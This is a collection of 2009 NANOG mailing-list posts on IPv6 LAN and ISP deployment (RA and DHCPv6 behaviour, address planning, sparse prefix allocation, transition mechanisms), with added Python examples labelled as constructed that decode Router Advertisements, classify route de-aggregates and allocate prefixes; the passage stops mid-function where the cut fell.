network, and I'm a tech guy.


Can we put this in to a FAQ somewhere, I write this in almost every  
IPv6 thread that comes up on NANOG.




The reason Ray's perceived problem exists is that when using DHCPv6  
stateful for address configuration, you should also include the prefix  
in an RA message. This is because DHCPv6 doesn't give out prefix  
lengths, it only gives out addresses.


There is an option (the A bit) with each prefix in an RA message,  
which says whether this prefix can be used for SLAAC or not (1 =  
SLAAC). Ray's perception (fear?) is that there are some  
implementations that will ignore the contents of this bit, and use the  
prefix for SLAAC regardless.


I'm interested to see if these implementations actually exist, I  
haven't come across any myself or heard of any - but I've not been  
looking.



Anyway, start here for a discussion of prefix lengths in DHCPv6:
http://www.ietf.org/mail-archive/web/dhcwg/current/msg07412.html

--
Nathan Ward
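The RA mechanics Nathan keeps restating (RA carries the prefix and its A bit; the M flag is the hint to run stateful DHCPv6; DHCPv6 itself never carries a prefix length) as an added Python example that builds an RA, decodes it and states what a conforming host does with it; it is not code from the post or its author. The constant and function names are mine, the RA bytes are constructed with a zero checksum, and the "ignore the A bit" behaviour Ray fears is exactly what a host would be doing if it did not follow `host_decision` here.

```python
"""Decode an ICMPv6 Router Advertisement (RFC 4861) and derive a host's
address-configuration decision from its flags. Constructed example."""
import ipaddress
import struct

ND_ROUTER_ADVERT = 134
OPT_PREFIX_INFO = 3


def build_ra(managed, other, prefixes, router_lifetime=1800):
    """RA body: 16-byte header, then one Prefix Information option per
    (network, on_link, autonomous) tuple. Checksum left zero."""
    flags = (0x80 if managed else 0) | (0x40 if other else 0)
    body = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, flags, router_lifetime, 0, 0)
    for net, on_link, autonomous in prefixes:
        net = ipaddress.IPv6Network(net)
        pflags = (0x80 if on_link else 0) | (0x40 if autonomous else 0)
        body += struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, net.prefixlen, pflags,
                            2592000, 604800, 0) + net.network_address.packed
    return body


def parse_ra(body):
    """Return {'M', 'O', 'default_router', 'prefixes': [{'prefix', 'L', 'A'}]}."""
    if len(body) < 16 or body[0] != ND_ROUTER_ADVERT:
        raise ValueError("not a Router Advertisement")
    _, _, _, _, flags, lifetime, _, _ = struct.unpack("!BBHBBHII", body[:16])
    info = {"M": bool(flags & 0x80), "O": bool(flags & 0x40),
            "default_router": lifetime > 0, "prefixes": []}
    off = 16
    while off + 2 <= len(body):
        otype, olen = body[off], body[off + 1]
        if olen == 0:                       # RFC 4861 4.6: such a packet is discarded
            raise ValueError("zero-length ND option")
        opt = body[off:off + olen * 8]
        if otype == OPT_PREFIX_INFO and olen == 4:
            net = ipaddress.IPv6Network((opt[16:32], opt[2]), strict=False)
            info["prefixes"].append({"prefix": str(net),
                                     "L": bool(opt[3] & 0x80),    # on-link
                                     "A": bool(opt[3] & 0x40)})   # autonomous (SLAAC)
        off += olen * 8
    return info


def host_decision(info):
    """What a conforming host does: SLAAC only on prefixes with A=1; stateful
    DHCPv6 if M=1, stateless (other-config) DHCPv6 if only O=1. The prefix
    length and on-link knowledge come from the RA either way."""
    mode = "dhcpv6-stateful" if info["M"] else "dhcpv6-stateless" if info["O"] else "none"
    return {"slaac_prefixes": [p["prefix"] for p in info["prefixes"] if p["A"]],
            "on_link_prefixes": [p["prefix"] for p in info["prefixes"] if p["L"]],
            "dhcpv6": mode}


if __name__ == "__main__":
    # Constructed: stateful DHCPv6 network, prefix advertised for on-link use only (A=0).
    ra = build_ra(managed=True, other=False, prefixes=[("2001:db8:1::/64", True, False)])
    print(host_decision(parse_ra(ra)))
    # Constructed: plain SLAAC network (A=1, no DHCPv6 hint).
    ra = build_ra(managed=False, other=False, prefixes=[("2001:db8:2::/64", True, True)])
    print(host_decision(parse_ra(ra)))
```

Fed with RAs taken off a LAN segment, the same decoder is a convenient basis for spotting an advertisement that should not be there (unexpected prefix, unexpected M/A combination) before the switch-side filtering discussed later in the thread is available.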




Re: IPv6 Deployment for the LAN

2009-10-18 Thread Nathan Ward

On 18/10/2009, at 9:22 PM, Mark Smith wrote:


I'm curious what the issue is with not having a default-router option
in DHCPv6?


This mechanism is provided by RA.
RA is needed to tell a host to use DHCPv6, so RA is going to be there  
whenever you have DHCPv6.
There's no point putting a default router option in to DHCPv6 at this  
point.



If it's because somebody could start up a rogue router and announce
RAs, I think a rogue DHCPv6 server is (or will be) just as much a
threat, if not more of one - I think it's more likely server OSes will
include DHCPv6 servers than RA servers.



Perhaps, but if you're operating a LAN segment you're going to want to
filter rogue RA and DHCPv6 messages from your network, just like you do
with DHCP in IPv4.

Filtering RA and DHCPv6 are done in very similar ways.

--
Nathan Ward




Re: IPv6 Deployment for the LAN

2009-10-18 Thread Nathan Ward

On 18/10/2009, at 9:52 PM, Chuck Anderson wrote:


On Sun, Oct 18, 2009 at 09:29:41PM +1300, Nathan Ward wrote:
Perhaps, but if you're operating a LAN segment you're going to want to
filter rogue RA and DHCPv6 messages from your network, just like you do
with DHCP in IPv4.
Filtering RA and DHCPv6 are done in very similar ways.


Unfortunately, no.  Many/most LAN switches don't support filtering
IPv6 traffic yet.  Of those that do, most only support TCP/UDP ports
but not ICMPv6 types or RA specifically.  Therefore, right now it is
probably easier to find support to filter DHCPv6 (udp source port 547)
than it is to find support to filter RA.  This is a real problem even
for people who are not using IPv6 right now and have no desire to use
IPv6 yet, because Rogue RAs will redirect all IPv6 traffic to a rogue
box on the LAN, breaking access to dual-stack servers on the Internet.
The impact is worse when you start trying to roll out IPv6 dual-stack
to selected servers on your own LAN.


This is true for now until we get switches with code to do this, and  
also doesn't change my point.


--
Nathan Ward




Re: IPv6 Deployment for the LAN

2009-10-18 Thread Nathan Ward

On 18/10/2009, at 11:02 PM, Andy Davidson wrote:


On 18 Oct 2009, at 09:29, Nathan Ward wrote:


RA is needed to tell a host to use DHCPv6


This is not ideal.


Why?
Remember RA does not mean SLAAC, it just means RA.

--
Nathan Ward


Re: IPv6 Deployment for the LAN

2009-10-18 Thread Nathan Ward


On 19/10/2009, at 1:10 AM, Owen DeLong wrote:


On Oct 18, 2009, at 3:05 AM, Nathan Ward wrote:


On 18/10/2009, at 11:02 PM, Andy Davidson wrote:


On 18 Oct 2009, at 09:29, Nathan Ward wrote:


RA is needed to tell a host to use DHCPv6


This is not ideal.


Why?
Remember RA does not mean SLAAC, it just means RA.


Because RA assumes that all routers are created equal.


RFC4191


Because RA is harder to filter.


DHCP in IPv4 was hard to filter before vendors implemented it, too.

Because the bifurcated approach to giving a host router/mask
information and address information
creates a number of unnecessary new security concerns.


Security concerns would be useful to explore. Can you expand on this?

--
Nathan Ward


Re: IPv6 Deployment for the LAN

2009-10-17 Thread Nathan Ward

On 18/10/2009, at 2:28 PM, William Herrin wrote:


On Sat, Oct 17, 2009 at 8:55 PM, Ray Soucy r...@maine.edu wrote:
As it turns out delivering IPv6 to the edge in an academic setting has
been a challenge.  Common wisdom says to rely on SLAAC for IPv6
addressing, and in a perfect world it would make sense.


Ray,

Common wisdom says that?


Our current IPv6 allocation schema provides for a 64-bit prefix for
each network.  Unfortunately, this enables SLAAC; yes, you can
suppress the prefix advertisement, and set the M and O flags, but that
only prevents hosts that have proper implementations of IPv6 from
making use of SLAAC.  The concern here is that older hosts with less
than OK implementations will still enable IPv6 without regard for the
stability and security concerns associated with IPv6.


I thought someone had to respond to router solicitations for stateless
autoconfig of global scope addresses to happen. On Linux you just
don't run the radvd. On Cisco I think it's something like ipv6 nd
suppress-ra in the interface config. Does that fail to prevent
stateless autoconfig? Or is there a problem with the operation of
DHCPv6 if router advertisements aren't happening from the router?


RA is generally required whether you use stateless or stateful  
autoconfiguration. You have to tell the hosts to send a DHCPv6  
DISCOVER message by turning on the managed flag in the RA.


RA does not mean that SLAAC happens.


Ray, do you have examples of hosts or stacks that ignore  
AdvAutonomousFlag?


--
Nathan Ward



Re: ISP customer assignments

2009-10-15 Thread Nathan Ward

On 16/10/2009, at 1:17 PM, Chris Adams wrote:


Is there any good solution to this?  I don't expect us to fill the /32
to justify expanding it (although I do see ARIN appears to have left
space for up to a /29; I guess that's their sparse allocation policy?).


Your justification is that you have two sites without a guaranteed  
link between them.


This is a bit annoying though, yeah. But, I'm not sure I can think of  
a good solution that doesn't involve us changing the routing system so  
that we can handle a huge amount of intentional de-aggregates or  
something.


--
Nathan Ward



Re: ISP customer assignments

2009-10-14 Thread Nathan Ward
Ok, I've decided to do this a different way to my usual ranting.  
Instead of explaining the options over and over and hoping people can  
make sense of the complexities of it, become experts, and make good  
informed decisions, I've made a flow chart. Feel free to ask about  
details and I can get in to the ranting part, this is really a place  
to start.


Right now it assumes people only provide DSL or other dynamic sort of  
services.
It also assumes DS-Lite people are insane, so probably need better  
language there.
Also the first question is not necessarily about who you are, but who  
is driving the IPv6 'build' - which is why native, 6rd and ds-lite are  
not appropriate for the customer-driven side. I hope that makes sense.
No talk about ISATAP and stuff for inside the customer network either.  
And before you ask no ISATAP is not appropriate for ISPs, doesn't work  
through NAT.


Anyway:
- 6RD is used by free.fr. Not widely implemented by anyone yet.
- DS-Lite is something some guys at Comcast and others are talking  
about. Not widely implemented by anyone yet.

- The rest you can figure out from wikipedia and stuff.

Please email me with any corrections, complaints, or threats if you're  
a DS-Lite fan. I'll always keep old versions in this directory, and  
the latest version will always have this filename, so please link to  
it instead of copying it, etc. etc.:


http://www.braintrust.co.nz/resources/ipv6_flow_chart/ipv6_flow_chart-current.pdf


On 13/10/2009, at 11:26 PM, Adrian Chadd wrote:


Nathan Ward, please stand up.



Adrian

On Tue, Oct 13, 2009, TJ wrote:


-Original Message-
From: Justin
To go along with Dan's query from above, what are the preferred methods
that other SPs are using to deploy IPv6 with non-IPv6-capable edge
hardware?  We too have a very limited number of dialup customers and
will never sink another dollar in the product.  Unfortunately I also
have brand-new ADSL2+ hardware that doesn't support IPv6 and according
to the vendors (Pannaway) never will.  We also have CMTSs that don't
support IPv6, even though they too are brand-new.  Those CMTSs top out
at DOCSIS 2.0 and the vendor decided not to allow IPv6 to the CPEs
regardless of the underlying CM's IPv6 support or lack thereof (like
Cisco allowed for example).  Are providers implementing tunneling
solutions?  Pros/cons of the various solutions?


My first (potentially ignorant) response would be to get your acquisitions
people aligned with your business, and by that I mean they should be making
a concerted effort to only buy IPv6 capable gear, especially when IPv6 is
coming to you within that gears lifecycle.
I guess your customers will need to tunnel, as long as you give them a public
IP they have 6to4 (and possibly Teredo, tunnel broker) - but native is
better.




--
- Xenion - http://www.xenion.com.au/ - VPS Hosting - Commercial Squid Support -
- $24/pm+GST entry-level VPSes w/ capped bandwidth charges available in WA -










Re: ISP customer assignments

2009-10-14 Thread Nathan Ward


On 14/10/2009, at 7:23 PM, Mark Andrews wrote:


DS-Lite is there for when the ISP runs out of IPv4 addresses to
hand one to each customer.  Many customers don't need a unique IPv4
address, these are the ones you switch to DS-Lite.  Those that do
require a unique IPv4 you leave on full dual stack for as long as
you can.
The authors of DS-lite say it's because running a dual stack network is hard.


You clearly don't share that view, so in your view what's wrong with
dual stack with IPv4 for everyone then, whether they need a unique
address or not?


DS-lite requires CGN, so does dual stack without enough IPv4 addresses.

This is probably the wrong forum for a DS-lite debate. I'm sure people  
have a use for it, they actually might have gear that can only do IPv4  
OR IPv6 but not both or something.
My problem with it is that it's being seen as a solution for a whole  
lot of people, when in reality it's a solution for a small number of  
people.




Thanks for the point about the tunnel brokers though, I missed that,  
I'll update this tomorrow with any suggestions I get before then.


--
Nathan Ward


Re: IPv6 internet broken, Verizon route prefix length policy

2009-10-13 Thread Nathan Ward

On 13/10/2009, at 5:46 PM, Kevin Loch wrote:


I think he was pointing out that extra routes due to slow start
policies should not be a factor in v6.  My guess is that is about
half of the extra routes announced today, the other half being
TE routes.



You can pretty easily figure out how many advertised prefixes are  
intentional de-aggregates, and you can get a fairly good idea as to  
how many of them are for TE as well I expect, by looking for different  
AS paths.


Someone mentioned some slides earlier in this thread by Vince Fuller  
at APRICOT early '07 that from memory have pretty good data on this.


--
Nathan Ward
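The heuristic Nathan sketches here (find advertised more-specifics that sit inside a less-specific with the same origin, then look at whether the AS path differs to separate plain de-aggregation from TE) as an added Python example over a constructed RIB extract; it is not code from the post, its author, or the Vince Fuller slides mentioned. The AS numbers are from the private/documentation range, and the function names and the three labels are my assumptions.

```python
"""Classify de-aggregates in a (constructed) routing table by AS path."""
import ipaddress
from collections import Counter

# Constructed RIB extract: (prefix, AS path). Not real routing data.
SAMPLE_RIB = [
    ("2001:db8::/32",      (64496, 64500)),
    ("2001:db8::/48",      (64496, 64500)),   # same path as the /32: plain de-aggregate
    ("2001:db8:1::/48",    (64497, 64500)),   # same origin, other path: looks like TE
    ("2001:db8:2::/48",    (64496, 64501)),   # different origin: a customer's own prefix
    ("2001:db8:ffff::/48", (64498, 64500)),   # same origin, other path: looks like TE
    ("2001:db9::/32",      (64499, 64502)),
]


def classify_deaggregates(rib):
    """For each prefix, find its most specific covering prefix with the same
    origin AS (last element of the path) and compare the full paths.

    Returns {prefix: 'not-covered' | 'covered-same-path' | 'covered-different-path'}.
    'covered-different-path' is suggestive of traffic engineering, not proof.
    """
    routes = [(ipaddress.ip_network(p), path) for p, path in rib]
    result = {}
    for net, path in routes:
        covering = [(c, cpath) for c, cpath in routes
                    if c.version == net.version and c.prefixlen < net.prefixlen
                    and net.subnet_of(c) and cpath[-1] == path[-1]]
        if not covering:
            result[str(net)] = "not-covered"
            continue
        _, cpath = max(covering, key=lambda item: item[0].prefixlen)
        result[str(net)] = "covered-same-path" if cpath == path else "covered-different-path"
    return result


def summary(rib):
    """Counts per label, the figure the post says is easy to get from a table."""
    return dict(Counter(classify_deaggregates(rib).values()))


if __name__ == "__main__":
    for prefix, label in classify_deaggregates(SAMPLE_RIB).items():
        print(f"{prefix:22} {label}")
    print(summary(SAMPLE_RIB))
```

On a real table the input would be the prefix and AS path columns of a `show bgp` or a route collector dump; the origin check keeps customer PI space that happens to sit inside an upstream's aggregate from being counted as that upstream's de-aggregation.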



Re: ISP customer assignments

2009-10-13 Thread Nathan Ward


On 14/10/2009, at 3:49 PM, Chris Adams wrote:


Once upon a time, Nathan Ward na...@daork.net said:

On 14/10/2009, at 2:14 PM, Chris Adams wrote:

What about web-hosting type servers?  Right now, I've got a group of
servers in a common IPv4 subnet (maybe a /26), with a /24 or two routed
to each server for hosted sites.  What is the IPv6 equivalent?  I can
see a /64 for the common subnet, but what to route for aliased IPs for
web hosts?  It is kind of academic right now, since our hosting control
panel software doesn't handle IPv6, but I certainly won't be putting
2^64 sites on a single server.  Use a /112 here again as well?  Use a
/64 per server because I can?


Why route them to the servers? I would just put up a /64 for the web servers and bind addresses to your ethernet interface out of that /64 as they are used by each site.
I guess you might want to route them to the servers to save ND entries or something on your router?


In the past, we saw issues with thousands of ARP entries (it has been a while and I don't remember what issues now though).  Moving a block from one server to another didn't require clearing an ARP cache (and triggering a couple of thousand new ARP requests).


Yeah I figured as much.


Also, it is an extra layer of misconfiguration-protection: if the IPs are routed, accidentally assigning the wrong IP on the wrong server didn't actually break any existing sites (and yes, that is a lesson from experience).


I guess. The advantage of doing it with a single /64 for all of them  
is that you can move individual sites to other servers without much  
drama. That might not be useful for everyone of course.


--
Nathan Ward



Re: IPv6 internet broken, Verizon route prefix length policy

2009-10-12 Thread Nathan Ward

On 13/10/2009, at 8:26, Jeff McAdams je...@iglou.com wrote:

Verizon's policy has been related to me that they will not accept or propagate any IPv6 route advertisements with prefix lengths longer than /32.  Full stop.  So that even includes those of us that have /48 PI space from ARIN that are direct customers of Verizon.


What about the small matter of all of the current AAAAs for the IPv6 enabled root DNS servers?


--
Nathan Ward
 



Re: Practical numbers for IPv6 allocations

2009-10-06 Thread Nathan Ward


On 7/10/2009, at 6:10 AM, Doug Barton wrote:


Tony Hain wrote:

Doug Barton wrote:
In the following I'm assuming that you're familiar with the fact that staying on the 4-byte boundaries makes sense because it makes reverse DNS delegation easier. It also makes the math easier.


I assume you meant 4-bit.   ;)


Grrr, I hate when I do that. I spent quite a bit of time on this post,
and the one time I remembered that I needed to go back and
double-check what I wrote there I wasn't at the keyboard. Thanks for
keeping me honest.

There was one other thing you wrote that I wanted to clarify, you
indicated that I was arguing for ISPs to only get one shot at an IPv6
allocation. Since my post was already really long I chose to leave out
the bit about how (TMK, which could be outdated) the RIRs are
reserving a bit or two for their allocations to ISPs so going back and
expanding should be an easy thing to do. On a personal note, I hope
that we DO need to expand IPv6 allocations to ISPs as this thing
finally gets deployed.


My understanding is that the RIRs are doing sparse allocation, as  
opposed to reserving a few bits. I could be wrong.


--
Nathan Ward



Re: SMS

2009-09-22 Thread Nathan Ward

On 23/09/2009, at 4:29 AM, William Herrin wrote:

On Tue, Sep 22, 2009 at 11:59 AM, Scott Berkman sc...@sberkman.net wrote:

Some people use a serial interface to a specific model cell phones to directly send the message over the carrier's cellular network.  This is good in the event of isolation of a location from any IP connectivity to a carrier gateway.


The Multitech Multimodem GPRS model MTCBA-G-EN-F4 has an ethernet
port. Add a SIM card from your favorite wireless carrier and you can
send and receive SMS messages via AT commands over a TCP socket.
Problem is, it seizes up or otherwise founders every few weeks and has
to be power cycled.

Has anyone heard of other products with a good reliability record?


That is shocking.

I have had a fantastic track record with a Maestro 100 GSM modem with  
a serial interface.


One of my customers has one powered on for about a year now, and it's  
never missed a beat.


They apparently support TCP/IP and the datasheet mentions something  
about email, but I have no idea what that really means, and don't  
really care so much.

I send it standard GSM AT commands, and it just works.

I've done the whole old nokia handset thing in the past several times  
and it's *ok*. Now though, I say don't bother, this thing is maybe a  
couple hundred dollars, and saves you oodles of time fooling around  
making it work reliably.


--
Nathan Ward




Re: Network Ring

2009-09-07 Thread Nathan Ward

On 7/09/2009, at 4:14 PM, ty chan wrote:

I am in process of planning ring network to cover 15 POPs in City.  
Some technologies are chosen for consideration like SDH(Huawei),  
PVRST+(Cisco), RSTP(Zyxel), EAPS (extreme network) and MPLS(VPLS).  
The purpose is to provide L2 Ethernet connectivities from POPs to  
central point (DC) and ring protection.


Of the above, VPLS.

But it really depends what you need to do. If you're selling customers  
cross-town L2 services then yeah VPLS is the best option in my opinion.
If this is for use between your own equipment, other technologies  
might make more sense.


I echo Roland's comment, but I'll make it more specific - stay away  
from anything with spanning tree in it.


--
Nathan Ward



Re: Anyone else seeing (invalid or corrupt AS path) 3 bytes E01100 ?

2009-08-20 Thread Nathan Ward

On 19/08/2009, at 6:58 AM, Ivan Pepelnjak wrote:

No. You cannot influence the inbound traffic apart from not advertising some of your prefixes to some of your neighbors or giving them hints with BGP communities or AS-path prepending. Whatever you do with BGP on your routers influences only the paths the outbound traffic is taking. What you'd actually need is remote-triggered black hole. Search the Nanog archives for RTBH, you'll find a number of links in a message from Frank Bulk sent a few days ago.



Or, you can prepend your advertisement with the troublesome ASN.

Works for one or two troublesome ASNs as a quick hack at 3am - don't  
do it unless you understand why it works and why you shouldn't do it.


--
Nathan Ward




Re: IPv6 Addressing Help

2009-08-19 Thread Nathan Ward


On 16/08/2009, at 1:29 AM, William Herrin wrote:


Start with: /32
Sparsely allocate 200 /56's

Total remaining space: in excess of /33. In fact, you haven't consumed
a single /48.
Expandability by altering the netmask: to /40
Largest allocation still possible: only /40



My suggestion was to sparsely allocate /48s to push addresses to POPs  
(or something topologically relevant to your network, maybe even  
NASes) as required.


So, 200 /56s, sparsely allocated, would still be one /48 (or however  
many /48s you want to have around your network, as above).


Sparse allocation within each of those /48s is also potentially a good  
idea - case by case. Doesn't make sense on an ADSL pool where everyone  
has the same length. Makes sense where you're assigning address space  
to customers who are likely to have different prefix lengths.


Sparse allocation of /48s within a /32 has the advantage of letting  
you grow each area of your address space in each area independently.  
You can put one /48 in one POP or NAS or something, and 10 in another,  
without having to break any of your addressing architecture rules.


/48s seem flexible enough to me, but perhaps you want to use this  
technique with /44s or /40s, or something.


--
Nathan Ward




Re: IPv6 Addressing Help

2009-08-15 Thread Nathan Ward


On 15/08/2009, at 4:34 PM, Randy Bush wrote:


I'm going to contradict you there. Classful addressing had a lot to
recommend it. The basic problem we ran in to was that there weren't
enough B's for everyone who needed more than a C and there weren't
enough A's period. So we started handing out groups of disaggregate
C's and that path led to the swamp.


the swamp preceded cidr

and, if you had a bit of simple arithmetic clue, you would realize that, unless you are prescient, you will always run out of some classes before others.  as we are very poor at predicting the future, there was no win to be had in classful.



This is really this basis of my reply, so, I'll just say +1

Read about how sparse allocation/binary chop stuff works. You get the  
same amount of routes in your IGP table (or less) but it's much more  
flexible.


--
Nathan Ward




Re: IPv6 Addressing Help

2009-08-14 Thread Nathan Ward

On 15/08/2009, at 1:03 AM, Chris Gotstein wrote:

We are a small ISP that is in the process of setting up IPv6 on our  
network.  We already have the ARIN allocation and i have a couple  
routers and servers running dual stack.  Wondering if someone out  
there would be willing to give me a few pointers on setting up my  
addressing scheme?  I've been mulling over how to do it, and i think  
i'm making it more complicated than it needs to be.  You can hit me  
offlist if you wish to help.  Thanks.


I have some things to say on this. I've padded some of the following  
with zeros to make it easier to read/understand.


Let's say your allocation is 2001:db8::/32 (doc prefix)

2001:db8::/32
2001:db8::/48 - ISP use
 2001:db8::/64 - ISP internal routers
  2001:db8::/112 - 65K loopbacks for your routers
  2001:db8::0001:0/112
   .. through ..
  2001:db8::ffff:ffff:ffff:0/112 - 281 trillion link nets between your routers

  2001:db8::0001::/64
   .. through ..
  2001:db8::ffff::/64 - 65K-1 /64s for ISP servers, offices, etc. etc.

2001:db8:0001::/48
 .. through ..
2001:db8:000f::/48 - 9M Customer link nets
2001:db8:0010::/48
 .. through ..
2001:db8:ffff::/48 - Assigned to customers


Some notes:
1) The Customer link nets block should be long enough for you to get  
one link net per customer tail. You should do /64s for link nets to  
customers, unless you are *certain* that *all* customer devices will  
support whatever else you choose to use. The 15 I have suggested here  
gives you ~9M.
2) The Assigned to customers block can be chopped up in to /48s or /56s or /60s or whatever you want. I recommend chopping customer prefixes on 4-bit boundaries (4 bits per hex digit). Less IP math in your head = easier life. Especially for helpdesk staff, and customers themselves.
3) Filter the ISP internal routers prefix at your border. This is  
equivalent to your /30s, /31s and /32s in IPv4 land.
4) The reason we have the loopbacks in the very first /112, is you  
will have to type them a lot, and fudging them can make your network  
melt down.
5) The reason we have the ISP internal /64s in the first /64s, is for  
the same reason as (4).
6) The reason we have ISP servers etc. in the following /64s, is these  
are also short to type, which means customers and first line support  
can type your DNS server addresses easily, read them over the phone,  
etc.
7) Allow the first /48 through all your filters that normally impact  
customers - and rate shaping, etc. etc. This first /48 is for ISP  
stuff, no customers should ever be on it. This is the only place where  
ISP stuff should ever live.



You will have a temptation to chop your customer address space up in  
to City, POP, etc. I recommend resisting that - you are  
reinventing classful addressing, and when one POP or city grows too  
large, you have to make exceptions to your rules.
Instead, when you need new addresses in an area (ie. you need more  
than zero IPv6 addresses at a POP) assign it a /48. Then when you need  
more, assign it another /48.
You can do this intelligently, using the binary chop/sparse allocation method that Geoff Huston has written about. This lets you grow your /48s in to /47s, or /46s as need arises.
By doing your assignment this way, you don't get tied in to silly rules, nor do you get IGP bloat.
I have an extensible IP management tool that I've been hacking on  
heaps in the last week that does this stuff for you. It should be  
ready for people to tinker with in the next few weeks.



--
Nathan Ward

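
The binary chop / sparse allocation method referred to in this post and in the two earlier "IPv6 Addressing Help" replies (sparsely allocating /48s to POPs within the /32, and /56s within a /48), written out as a small allocator. This is an added example and not the IP management tool mentioned above, nor Geoff Huston's code; the class name and the pool/length arguments are my own, and the allocation order (bit-reversed counter) is the standard way to place each new block at the midpoint of the largest remaining gap.

```python
import ipaddress


class SparseAllocator:
    """Hand out fixed-length prefixes from a pool in bit-reversed (binary chop)
    order, so successive allocations land as far apart as possible and each one
    can later be widened in place (a /48 growing into a /47, /46, ...)."""

    def __init__(self, pool, prefixlen):
        self.pool = ipaddress.ip_network(pool)
        self.prefixlen = prefixlen
        self.index_bits = prefixlen - self.pool.prefixlen
        if self.index_bits <= 0:
            raise ValueError("allocation length must be longer than the pool")
        self.count = 0
        self.allocated = []

    def allocate(self):
        """Next block: counter 0,1,2,3 becomes index 0000.., 1000.., 0100.., 1100.."""
        if self.count >= 1 << self.index_bits:
            raise RuntimeError("pool exhausted")
        reversed_index = int(format(self.count, "0%db" % self.index_bits)[::-1], 2)
        self.count += 1
        shift = self.pool.max_prefixlen - self.prefixlen
        base = int(self.pool.network_address)
        net = ipaddress.ip_network((base + (reversed_index << shift), self.prefixlen))
        self.allocated.append(net)
        return net

    def max_growth(self, net):
        """Widest prefix `net` can grow into without swallowing another
        allocation: widen one bit at a time and stop at the first collision."""
        best = net
        for plen in range(net.prefixlen - 1, self.pool.prefixlen - 1, -1):
            candidate = net.supernet(new_prefix=plen)
            if any(other != net and other.subnet_of(candidate) for other in self.allocated):
                break
            best = candidate
        return best


if __name__ == "__main__":
    # /48s for POPs out of the ISP /32, as in the plan above (doc prefix).
    pops = SparseAllocator("2001:db8::/32", 48)
    for name in ("pop-a", "pop-b", "pop-c"):
        block = pops.allocate()
        print(name, block, "can grow to", pops.max_growth(block))
    # 200 customer /56s sparsely allocated still fit in one /48.
    customers = SparseAllocator("2001:db8:10::/48", 56)
    blocks = [customers.allocate() for _ in range(200)]
    print(len(blocks), "customer /56s, all inside", customers.pool)
```

With three POP /48s allocated the first one can still grow to a /34 and the second to a /33, which is the "grow each area independently" property described above; the same allocator run at /56 inside a /48 shows the 200-customer case from the earlier thread staying inside a single /48.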




Re: Botnet hunting resources (was: Re: DOS in progress ?)

2009-08-10 Thread Nathan Ward

On 10/08/2009, at 8:11 PM, goe...@anime.net wrote:
such a list would include all of chinanet and france telecom. it  
would likely not last long.


You've mentioned France twice now. Is there a big botnet problem  
there? I've never heard of anything like that.
I'll admit I don't follow this area of the network closely, but I'm  
sure there are other places higher up the list than FTE..


--
Nathan Ward




Re: cisco.com

2009-08-04 Thread Nathan Ward

On 5/08/2009, at 1:34 AM, R. Benjamin Kessler wrote:


Hey Gang -

I'm unable to get to cisco.com from multiple places on the 'net
(including downforeveryoneorjustme.com); any ideas on the cause and  
ETR?



CCNAs everywhere panic as their monitoring tools tell them that the  
'Internet' is down.


--
Nathan Ward




Re: Verizon transparent web caching issue? WASRe: Data Center QoS equipment breaking http 1.1?

2009-07-31 Thread Nathan Ward

On 1/08/2009, at 1:06 PM, u...@3.am wrote:



Again, turned out to be my own stupidity.  It was just DNS on a  
secondary DNS server, which was pointing to the old IP, which was  
redirecting to the new IP, but at that point, the headers are lost.


I would have thought that on MacOSX (my client; the server is  
FreeBSD 7.2-STABLE), if I tell the /etc/resolv.conf to look at the  
primary name server only, which has the correct info, plus doing a  
dnscacheutil -flushcache, that this wouldn't be an issue.


Apparently, I was wrong, or perhaps it doesn't override what Verizon  
does with my browser's queries, despite what nslookup shows in a  
terminal window.



As you are on OS X, have a read of 
http://developer.apple.com/documentation/Darwin/Reference/Manpages/man5/resolver.5.html

It lets you do per-domain resolvers, and so on.

--
Nathan Ward




Re: Subnet Size for BGP peers.

2009-07-29 Thread Nathan Ward

On 30/07/2009, at 7:59 AM, Jim Wininger wrote:

I have a question about the subnet size for BGP peers. Typically when we turn up a new BGP customer we turn them up on a /29 or a /30. That seems to be the norm.

We connect to many of our BGP peers with ethernet. It would be a simple matter to allocate a /24 for connectivity to the customer on a shared link. This would help save on some address space.

My question is, is this in general good or bad idea? Have others been down this path and found that it was a bad idea? I can see some of the potholes on this path (BGP session hijacking, incorrectly configured customer routers etc). These issues could be at least partially mitigated. Are there larger issues when doing something like this or is it a practical idea?



What is your access network? Do you have a switch port per customer?
If so, look in to private VLANs on Cisco, or whatever similar feature  
exists for your vendor.


--
Nathan Ward




Re: Anomalies with AS13214 ?

2009-07-28 Thread Nathan Ward

On 12/05/2009, at 4:47 AM, David Freedman wrote:


Yeah, interesting contact name on this:

person:         Fredrik Neij
address:        DCPNetworks
address:        Box 161
address:        SE-11479 Stockholm
address:        Sweden
mnt-by:         MNT-DCP
phone:          +46 707 323819
nic-hdl:        FN2233-RIPE
source:         RIPE # Filtered


Dispatch someone from IETF, that is on in Stockholm right now.

Actually, Paul Jakma might be there, dispatch him if it really is a  
Quagga bug.


--
Nathan Ward




Re: Public/testing 4to6 gateway?

2009-07-13 Thread Nathan Ward

On 14/07/2009, at 4:23 AM, Rick Ernst wrote:

Either they don't exist, or my Google-fu is particularly bad this morning.

I'm trying to get my toes wet with IPv6.  I've established an internal 6to4/4to6 tunnel.  I'd also like to have a testbed for access to public v6 sites.  I'm also trying to find some clue at my upstreams, but figured I'd ask here as well.  Are there any 4to6 gateway available?  I have assigned v6 space.



Because I'm pedantic, 6to4 and 6in4 are two different things. It  
sounds like you want 6in4.
They use the same encapsulation, but 6to4 has specific magic in how  
the outer IPv4 destination is built, taken from the inner IPv6  
destination address.

6over4 is different again.

I think someone wrote a draft explaining this a while back.. not sure  
where or what it was called.


--
Nathan Ward
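
The distinction in the reply above, shown as code: both 6to4 and 6in4 wrap the IPv6 packet in an IPv4 header with protocol 41, but 6to4 derives the outer IPv4 destination from the inner IPv6 destination (the embedded address for 2002::/16 targets, the RFC 3068 relay anycast 192.88.99.1 otherwise) while 6in4 always sends to the configured tunnel endpoint. This is an added example, not code from the thread; the function names are mine, the addresses are documentation ranges, and the encapsulation builds only the IPv4 header (no fragmentation, no MTU handling).

```python
import ipaddress
import struct

SIXTO4_PREFIX = ipaddress.ip_network("2002::/16")            # RFC 3056
SIXTO4_RELAY_ANYCAST = ipaddress.ip_address("192.88.99.1")  # RFC 3068
IPPROTO_IPV6 = 41  # protocol number shared by 6to4 and 6in4 (the encapsulation is the same)


def sixto4_prefix_for(v4addr):
    """The 2002:V4ADDR::/48 a 6to4 site derives from its public IPv4 address."""
    v4 = int(ipaddress.ip_address(v4addr))
    return ipaddress.ip_network(((0x2002 << 112) | (v4 << 80), 48))


def sixto4_outer_dst(inner_dst):
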